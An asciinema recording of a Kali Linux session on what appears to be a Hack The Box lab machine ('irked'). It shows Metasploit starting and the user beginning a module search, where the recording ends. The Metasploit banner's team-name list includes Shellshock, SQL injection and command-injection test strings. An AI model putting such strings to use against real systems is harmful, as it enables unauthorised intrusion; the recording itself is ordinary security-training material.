{"version": 2, "width": 172, "height": 83, "timestamp": 1662757941, "env": {"SHELL": "/bin/bash", "TERM": "xterm-256color"}}
[0.097046, "o", "\u001b[?25l\u001b[?7l"]
[0.109509, "o", "\u001b[0m\u001b[34m\u001b[1m..............\r\n            ..,;:ccc,.\r\n"]
[0.110189, "o", "          ......''';lxO.\r\n.....''''..........,:ld;\r\n           .';;;:::;,,.x,\r\n      ..'''.            0Xxoc:,.  ...\r\n  ....                ,ONkc;,;cokOdc',.\r\n .                   OMo           ':\u001b[38;5;8m\u001b[1mdd\u001b[0m\u001b[34m\u001b[1mo.\r\n                    dMc               :OO;\r\n                    0M.                 .:o.\r\n                    ;Wd\r\n                     ;XO,\r\n                       ,d0Odlc;,..\r\n                           ..',;:cdOOd::,.\r\n                                    .:d;.':;.\r\n                                       'd,  .'\r\n                                         ;l   ..\r\n                                          .o\r\n                                            c\r\n                                            .'\r\n                                             .\u001b[0m\r\n\u001b[21A\u001b[9999999D"]
[0.113074, "o", "\u001b[51C\u001b[0m\u001b[1m\u001b[0m \r\n"]
[0.116061, "o", "\u001b[51C\u001b[0m\u001b[1m\u001b[0m \r\n"]
[0.118948, "o", "\u001b[51C\u001b[0m\u001b[1m\u001b[0m \r\n"]
[0.129421, "o", "\u001b[51C\u001b[0m\u001b[1m         USER\u001b[0m\u001b[0m:\u001b[0m \u001b[34m\u001b[1mroot\u001b[0m@\u001b[34m\u001b[1mkali\u001b[0m \r\n"]
[0.129771, "o", "\u001b[51C\u001b[0m\u001b[1m┌───────────────────────────────┐\u001b[0m \r\n"]
[0.135456, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ OS\u001b[0m\u001b[0m:\u001b[0m Kali GNU/Linux Rolling x86_64\u001b[0m "]
[0.138182, "o", "\r\n"]
[0.147652, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ Host\u001b[0m\u001b[0m:\u001b[0m VMware Virtual Platform None\u001b[0m \r\n"]
[0.151549, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ Kernel\u001b[0m\u001b[0m:\u001b[0m 5.15.0-kali3-amd64\u001b[0m \r\n"]
[0.174807, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ Uptime\u001b[0m\u001b[0m:\u001b[0m 3 days, 12 hours, 5 mins\u001b[0m \r\n"]
[0.253774, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ Packages\u001b[0m\u001b[0m:\u001b[0m 3725 (dpkg)\u001b[0m \r\n"]
[0.269418, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ Terminal\u001b[0m\u001b[0m:\u001b[0m asciinema\u001b[0m "]
[0.269468, "o", "\r\n"]
[0.324903, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ DE\u001b[0m\u001b[0m:\u001b[0m Xfce 4.16\u001b[0m "]
[0.325563, "o", "\r\n"]
[0.329955, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ WM\u001b[0m\u001b[0m:\u001b[0m Xfwm4\u001b[0m \r\n"]
[0.33716, "o", "\u001b[51C\u001b[0m\u001b[1m​ ​ Memory\u001b[0m\u001b[0m:\u001b[0m 4267MiB / 6877MiB\u001b[0m \r\n"]
[0.340211, "o", "\u001b[51C\u001b[0m\u001b[1m└───────────────────────────────┘\u001b[0m \r\n"]
[0.340438, "o", "\r\n\r\n\r\n\r\n\r\n\r\n\r\n"]
[0.342147, "o", "\u001b[?25h\u001b[?7h"]
[0.371676, "o", "\u001b[?2004h\u001b]0;root@kali: ~/htb/irked\u0007\u001b[1;37m┌──(\u001b[1;34mroot💀kali\u001b[1;37m)-[\u001b[0;1m~/htb/irked\u001b[1;37m]\r\r\n"]
[0.371923, "o", "\u001b[1;37m└─\u001b[1;34m#\u001b[0m "]
[1.262032, "o", "1"]
[2.083004, "o", "\b\u001b[K"]
[2.324014, "o", "t"]
[2.358633, "o", "m"]
[2.59607, "o", "u"]
[3.03302, "o", "x"]
[3.115503, "o", " "]
[3.23297, "o", "a"]
[3.277544, "o", "\r\n\u001b[?2004l\r"]
[3.280916, "o", "\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[?1006l\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?2004l\u001b[1;1H\u001b[1;83r\u001b[>c\u001b[>q\u001b[3;1H"]
[3.283666, "o", "\u001b[?25l\u001b[37m\u001b[1m\u001b[H┌──(\u001b[34mroot💀kali\u001b[37m)-[\u001b[39m~/htb/irked/10.10.10.117/exploit\u001b[37m]\u001b(B\u001b[m\u001b[K\u001b[37m\u001b[1m\r\n└─\u001b[34m#\u001b(B\u001b[m msfconsole\u001b[K\r\n[*] Starting the Metasploit Framework cOnsole...\\\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:25 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?"]
[3.283703, "o", "25h\u001b[3;1H"]
[3.284115, "o", "\u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[?1006l\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?2004l\u001b[1;1H\u001b[1;83r\u001b[3;1H"]
[3.284539, "o", "\u001b[?25l\u001b[37m\u001b[1m\u001b[H┌──(\u001b[34mroot💀kali\u001b[37m)-[\u001b[39m~/htb/irked/10.10.10.117/exploit\u001b[37m]\u001b(B\u001b[m\u001b[K\u001b[37m\u001b[1m\r\n└─\u001b[34m#\u001b(B\u001b[m msfconsole\u001b[K\r\n[*] Starting the Metasploit Framework cOnsole...\\\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\r\n\u001b[K\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\r\n  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:25 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?"]
[3.28462, "o", "25h\u001b[3;1H"]
[3.290391, "o", "\u001b[?7727h"]
[3.307955, "o", "[*] Starting the Metasploit Framework coNsole...|\r"]
[3.409533, "o", "[*] Starting the Metasploit Framework conSole.../\r"]
[3.510018, "o", "[*] Starting the Metasploit Framework consOle...-\r"]
[3.610575, "o", "[*] Starting the Metasploit Framework consoLe...\\\r"]
[3.711338, "o", "[*] Starting the Metasploit Framework consolE...|\r"]
[3.811981, "o", "[*] Starting the Metasploit Framework console.../\r"]
[3.914615, "o", "[*] Starting the Metasploit Framework console...-\r"]
[4.014906, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[4.115479, "o", "[*] Starting the Metasploit Framework console...|\r"]
[4.215601, "o", "[*] Starting the Metasploit Framework console.../\r"]
[4.28318, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:26 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[3;1H"]
[4.315808, "o", "[*] Starting the Metasploit Framework console...-\r"]
[4.416109, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[4.516725, "o", "[*] starting the Metasploit Framework console...|\r"]
[4.626359, "o", "[*] STarting the Metasploit Framework console.../\r"]
[4.727546, "o", "[*] StArting the Metasploit Framework console...-\r"]
[4.827763, "o", "[*] StaRting the Metasploit Framework console...\\\r"]
[4.928476, "o", "[*] StarTing the Metasploit Framework console...|\r"]
[5.02865, "o", "[*] StartIng the Metasploit Framework console.../\r"]
[5.132128, "o", "[*] StartiNg the Metasploit Framework console...-\r"]
[5.232942, "o", "[*] StartinG the Metasploit Framework console...\\\r"]
[5.285551, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:27 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[3;1H"]
[5.333635, "o", "[*] Starting the Metasploit Framework console...|\r"]
[5.43386, "o", "[*] Starting The Metasploit Framework console.../\r"]
[5.545114, "o", "[*] Starting tHe Metasploit Framework console...-\r"]
[5.646054, "o", "[*] Starting thE Metasploit Framework console...\\\r"]
[5.753268, "o", "[*] Starting the Metasploit Framework console...|\r"]
[5.853936, "o", "[*] Starting the metasploit Framework console.../\r"]
[5.954656, "o", "[*] Starting the MEtasploit Framework console...-\r"]
[6.054838, "o", "[*] Starting the MeTasploit Framework console...\\\r"]
[6.155548, "o", "[*] Starting the MetAsploit Framework console...|\r"]
[6.256271, "o", "[*] Starting the MetaSploit Framework console.../\r"]
[6.293563, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83d  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:28 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[3;1H"]
[6.357165, "o", "[*] Starting the MetasPloit Framework console...-\r"]
[6.457768, "o", "[*] Starting the MetaspLoit Framework console...\\\r"]
[6.55965, "o", "[*] Starting the MetasplOit Framework console...|\r"]
[6.660382, "o", "[*] Starting the MetasploIt Framework console.../\r"]
[6.760736, "o", "[*] Starting the MetasploiT Framework console...-\r"]
[6.861399, "o", "[*] Starting the Metasploit Framework console...\\\r"]
[6.882024, "o", "                                                  "]
[6.88244, "o", "\r\n"]
[6.89851, "o", "\r\n*Neutrino_Cannon*PrettyBeefy*PostalTime*binbash*deadastronauts*EvilBunnyWrote*L1T*Mail.ru*() { :;}; echo vulnerable*\r\n*Team sorceror*ADACTF*BisonSquad*socialdistancing*LeukeTeamNaam*OWASP Moncton*Alegori*exit*Vampire Bunnies*APT593*\r\n*QuePasaZombiesAndFriends*NetSecBG*coincoin*ShroomZ*Slow Coders*Scavenger Security*Bruh*NoTeamName*Terminal Cult*\r\n*edspiner*BFG*MagentaHats*0x01DA*Kaczuszki*AlphaPwners*FILAHA*Raffaela*HackSurYvette*outout*HackSouth*Corax*yeeb0iz*\r\n*SKUA*Cyber COBRA*flaghunters*0xCD*AI Generated*CSEC*p3nnm3d*IFS*CTF_Circle*InnotecLabs*baadf00d*BitSwitchers*0xnoobs*\r\n*ItPwns - Intergalactic Team of PWNers*PCCsquared*fr334aks*runCMD*0x194*Kapital Krakens*ReadyPlayer1337*Team 443*\r\n*H4CKSN0W*InfOUsec*CTF Community*DCZia*NiceWay*0xBlueSky*ME3*Tipi'Hack*Porg Pwn Platoon*Hackerty*hackstreetboys*\r\n*ideaengine007*eggcellent*H4x*cw167*localhorst*Original Cyan Lonkero*Sad_Pandas*FalseFlag*OurHeartBleedsOrange*SBWASP*\r\n*Cult of the Dead Turkey*doesthismatter*crayontheft*Cyber Mausoleum*scripterz*VetSec*n"]
[6.899019, "o", "orbot*Delta Squad Zero*Mukesh*\r\n*x00-x00*BlackCat*ARESx*cxp*vaporsec*purplehax*RedTeam@MTU*UsalamaTeam*vitamink*RISC*forkbomb444*hownowbrowncow*\r\n*etherknot*cheesebaguette*downgrade*FR!3ND5*badfirmware*Cut3Dr4g0n*dc615*nora*Polaris One*team*hail hydra*Takoyaki*\r\n*Sudo Society*incognito-flash*TheScientists*Tea Party*Reapers of Pwnage*OldBoys*M0ul3Fr1t1B13r3*bearswithsaws*DC540*\r\n*iMosuke*Infosec_zitro*CrackTheFlag*TheConquerors*Asur*4fun*Rogue-CTF*Cyber*TMHC*The_Pirhacks*btwIuseArch*MadDawgs*\r\n*HInc*The Pighty Mangolins*CCSF_RamSec*x4n0n*x0rc3r3rs*emehacr*Ph4n70m_R34p3r*humziq*Preeminence*UMGC*ByteBrigade*\r\n*TeamFastMark*Towson-Cyberkatz*meow*xrzhev*PA Hackers*Kuolema*Nakateam*L0g!c B0mb*NOVA-InfoSec*teamstyle*Panic*\r\n*B0NG0R3*                                                                                    *Les Cadets Rouges*buf*\r\n*Les Tontons Fl4gueurs*                                                                      *404 : Flag Not Found*\r\n*' UNION SELECT 'password*  \u001b[31m\u001b[1m    _________            "]
[6.899347, "o", "    __                         \u001b(B\u001b[m         *OCD247*Sparkle Pony* \r\n*burner_herz0g*             \u001b[31m\u001b[1m    \\_   ___ \\_____  _______/  |_ __ _________   ____   \u001b(B\u001b[m         *Kill$hot*ConEmu*\r\n*here_there_be_trolls*      \u001b[31m\u001b[1m    /    \\  \\/\\__  \\ \\____ \\   __\\  |  \\_  __ \\_/ __ \\  \u001b(B\u001b[m         *;echo\"hacked\"*\r\n*r4t5_*6rung4nd4*NYUSEC*    \u001b[31m\u001b[1m    \\     \\____/ __ \\|  |_> >  | |  |  /|  | \\/\\  ___/  \u001b(B\u001b[m         *karamel4e*\r\n*IkastenIO*TWC*balkansec*   \u001b[31m\u001b[1m     \\______  (____  /   __/|__| |____/ |__|    \\___  > \u001b(B\u001b[m         *cybersecurity.li*\r\n*TofuEelRoll*Trash Pandas*  \u001b[31m\u001b[1m            \\/     \\/|__|                           \\/  \u001b(B\u001b[m         *OneManArmy*cyb3r_w1z4rd5*\r\n*Astra*Got Schwartz?*tmux*  \u001b[31m\u001b[1m                ___________.__                          \u001b(B\u001b[m         *AreYouStuck*Mr.Robot.0*\r\n*\\nls*Juicy white peach*    \u001b[31m\u001b[1m                \\__    ___/|  |__   ____                \u001b(B\u001b[m         *EPITA Rennes*\r\n*HackerKnights*             \u001b[31m\u001b[1m                  |   "]
[6.89971, "o", " |   |  |  \\_/ __ \\               \u001b(B\u001b[m         *guildOfGengar*Titans*\r\n*Pentest Rangers*           \u001b[31m\u001b[1m                  |    |   |   Y  \\  ___/               \u001b(B\u001b[m         *The Libbyrators*\r\n*placeholder name*bitup*    \u001b[31m\u001b[1m                  |____|   |___|  /\\___  >              \u001b(B\u001b[m         *JeffTadashi*Mikeal*\r\n*UCASers*onotch*            \u001b[31m\u001b[1m                                \\/     \\/               \u001b(B\u001b[m         *ky_dong_day_song*\r\n*NeNiNuMmOk*                \u001b[31m\u001b[1m              ___________.__                            \u001b(B\u001b[m         *JustForFun!*\r\n*Maux de tête*LalaNG*       \u001b[31m\u001b[1m              \\_   _____/|  | _____     ____            \u001b(B\u001b[m         *g3tsh3Lls0on*\r\n*crr0tz*z3r0p0rn*clueless*  \u001b[31m\u001b[1m               |    __)  |  | \\__  \\   / ___\\           \u001b(B\u001b[m         *Phở Đặc Biệt*Paradox*\r\n*HackWara*                  \u001b[31m\u001b[1m               |     \\   |  |__/ __ \\_/ /_/  >          \u001b(B\u001b[m         *KaRIPux*inf0sec*\r\n*Kugelschreibertester*      \u001b[31m\u001b[1m               "]
[6.899823, "o", "\\___  /   |____(____  \u001b(B\u001b[m\u001b[31m\u001b[1m/\\___  /           \u001b(B\u001b[m         *bluehens*Antoine77*\r\n*icemasters*                \u001b[31m\u001b[1m                   \\/              \\//_____/            \u001b(B\u001b[m         *genxy*TRADE_NAMES*\r\n*Spartan's Ravens*          \u001b[31m\u001b[1m             _______________   _______________          \u001b(B\u001b[m         *BadByte*fontwang_tw*\r\n*g0ldd1gg3rs*pappo*         \u001b[31m\u001b[1m            \\_____  \\   _  \\  \\_____  \\   _  \\          \u001b(B\u001b[m         *ghoti*\r\n*Les CRACKS*c0dingRabbits*  \u001b[31m\u001b[1m             /  ____/  /_\\  \\  /  ____/  /_\\  \\         \u001b(B\u001b[m         *LinuxRiders*   \r\n*2Cr4Sh*RecycleBin*         \u001b[31m\u001b[1m            /       \\  \\_/   \\/       \\  \\_/   \\        \u001b(B\u001b[m         *Jalan Durian*\r\n*ExploitStudio*             \u001b[31m\u001b[1m            \\_______ \\_____  /\\_______ \\_____  /        \u001b(B\u001b[m         *WPICSC*logaritm*\r\n*Car RamRod*0x41414141*     \u001b[31m\u001b[1m                    \\/     \\/         \\/     \\/         \u001b(B\u001b[m         *Orv1ll3*team-fm4dd*\r\n*Björkson*FlyingCircus*                       "]
[6.899877, "o", "                                               *PwnHub*H4X0R*Yanee*\r\n*Securifera*hot cocoa*                                                                       *Et3rnal*PelarianCP*\r\n*n00bytes*DNC&G*guildzero*dorko*tv*42*{EHF}*CarpeDien*Flamin-Go*BarryWhite*XUcyber*FernetInjection*DCcurity*\r\n*Mars Explorer*ozen_cfw*Fat Boys*Simpatico*nzdjb*Isec-U.O*The Pomorians*T35H*H@wk33*JetJ*OrangeStar*Team Corgi*\r\n*D0g3*0itch*OffRes*LegionOfRinf*UniWA*wgucoo*Pr0ph3t*L0ner*_n00bz*OSINT Punchers*Tinfoil Hats*Hava*Team Neu*\r\n*Cyb3rDoctor*Techlock Inc*kinakomochi*DubbelDopper*bubbasnmp*w*Gh0st$*tyl3rsec*LUCKY_CLOVERS*ev4d3rx10-team*ir4n6*\r\n*PEQUI_ctf*HKLBGD*L3o*5 bits short of a byte*UCM*ByteForc3*Death_Geass*Stryk3r*WooT*Raise The Black*CTErr0r*\r\n*Individual*mikejam*Flag Predator*klandes*_no_Skids*SQ.*CyberOWL*Ironhearts*Kizzle*gauti*\r\n*San Antonio College Cyber Rangers*sam.ninja*Akerbeltz*cheeseroyale*Ephyra*sard city*OrderingChaos*Pickle_Ricks*\r\n*Hex2Text*defiant*hefter*Flaggermeister*Oxford Brookes University*OD1E*noob_"]
[6.89993, "o", "noob*Ferris Wheel*Ficus*ONO*jameless*\r\n*Log1c_b0mb*dr4k0t4*0th3rs*dcua*cccchhhh6819*Manzara's Magpies*pwn4lyfe*Droogy*Shrubhound Gang*ssociety*HackJWU*\r\n*asdfghjkl*n00bi3*i-cube warriors*WhateverThrone*Salvat0re*Chadsec*0x1337deadbeef*StarchThingIDK*Tieto_alaviiva_turva*\r\n*InspiV*RPCA Cyber Club*kurage0verfl0w*lammm*pelicans_for_freedom*switchteam*tim*departedcomputerchairs*cool_runnings*\r\n*chads*SecureShell*EetIetsHekken*CyberSquad*P&K*Trident*RedSeer*SOMA*EVM*BUckys_Angels*OrangeJuice*DemDirtyUserz*\r\n*OpenToAll*Born2Hack*Bigglesworth*NIS*10Monkeys1Keyboard*TNGCrew*Cla55N0tF0und*exploits33kr*root_rulzz*InfosecIITG*\r\n*superusers*H@rdT0R3m3b3r*operators*NULL*stuxCTF*mHackresciallo*Eclipse*Gingabeast*Hamad*Immortals*arasan*MouseTrap*\r\n*damn_sadboi*tadaaa*null2root*HowestCSP*fezfezf*LordVader*Fl@g_Hunt3rs*bluenet*P@Ge2mE*\u001b[66;1H       =[ \u001b[33mmetasploit v6.1.29-dev\u001b[39m                          ]\r\n+ -- --=[ 2198 exploits - 1164 auxiliary - 400 post       ]\r\n+ -- --=[ 596 payloads - 45 encoders - 11 nops         "]
[6.900172, "o", "   ]\r\n+ -- --=[ 9 evasion                                       ]\u001b[71;1HMetasploit tip: Use the \u001b[32medit\u001b[39m command to open the \r\ncurrently active module in your editor\u001b[74;1H\u001b[34m\u001b[1m[*]\u001b(B\u001b[m Starting persistent handler(s)...\r\n"]
[7.084202, "o", "\u001b[4mmsf6\u001b(B\u001b[m > "]
[7.281866, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:29 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[75;8H"]
[8.282061, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:30 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[75;8H"]
[9.28166, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:31 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[75;8H"]
[10.281767, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:32 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[75;8H"]
[11.281208, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:33 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[75;8H"]
[11.290941, "o", "s"]
[11.410669, "o", "e"]
[11.554906, "o", "a"]
[11.655773, "o", "r"]
[11.80395, "o", "c"]
[11.869767, "o", "h"]
[12.035815, "o", " "]
[12.120222, "o", "d"]
[12.201193, "o", "i"]
[12.282435, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:34 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[75;17H"]
[12.341573, "o", "s"]
[12.430853, "o", "t"]
[13.284579, "o", "\u001b[?25l\u001b[38;5;235m\u001b[48;5;231m\u001b[1m\u001b[83;1H  root@kali \u001b(B\u001b[m\u001b[38;5;231m\u001b[48;5;237m  irked \u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                               0:openvpn  1:nc- \u001b[38;5;235m\u001b[48;5;237m\u001b[38;5;231m\u001b[1m 2:ruby* \u001b(B\u001b[m\u001b[38;5;237m\u001b[48;5;235m\u001b[38;5;241m                                             \u001b[38;5;237m\u001b[38;5;231m\u001b[48;5;237m  05:12:35 \u001b[38;5;235m\u001b[48;5;231m  2022-09-10 \u001b(B\u001b[m\u001b[?12l\u001b[?25h\u001b[75;19H"]
